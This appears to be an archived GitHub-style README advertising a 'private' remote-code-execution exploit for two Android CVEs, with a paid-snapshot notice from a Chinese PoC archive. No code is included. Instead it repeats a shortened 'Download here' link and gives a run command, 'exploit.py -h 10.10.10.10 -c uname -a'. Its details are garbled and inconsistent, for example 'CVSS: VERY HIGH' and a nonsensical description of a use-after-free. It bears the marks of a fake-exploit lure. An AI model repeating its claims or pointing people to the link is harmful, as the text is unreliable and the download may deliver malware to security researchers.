关联漏洞
介绍
# CVE-2024-43093/43047: RCE in Android System.
## Overview
CVE-2024-43093 and CVE-2024-43047
## Exploit:
### [Download here](https://bit.ly/3AG3GCn)
## Details
- **CVE ID**: [CVE-2024-43047]
- **Published**: 2024-11-05
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 7.8
- **CVE ID**: [CVE-2024-43093]
- **Published**: 2024-11-05
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: VERY HIGH
## Vulnerability Description
CVE-2024-43093 is a critical vulnerability in the Android system.
Successful exploitation of the vulnerabilities could lead to remote code execution, denial of service, elevation of privilege or information disclosure on an affected system.
CVE-2024-43093 is a critical vulnerability in the Android system.
This critical vulnerability, reported as CVE-2024-43047 with a CVSS score of 7.8, is due to a Use-After-Free issue in the DSP algorithm service. It may cause memory corruption when saving the HLOS memory card or using RCE.
## Affected Versions
Android version 12, 12L, 13, 14 and 15
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Exploit:
### [Download here](https://bit.ly/3AG3GCn)
文件快照
[4.0K] /data/pocs/281dfca942acd831e98f6990321dd05872809492
└── [1.3K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。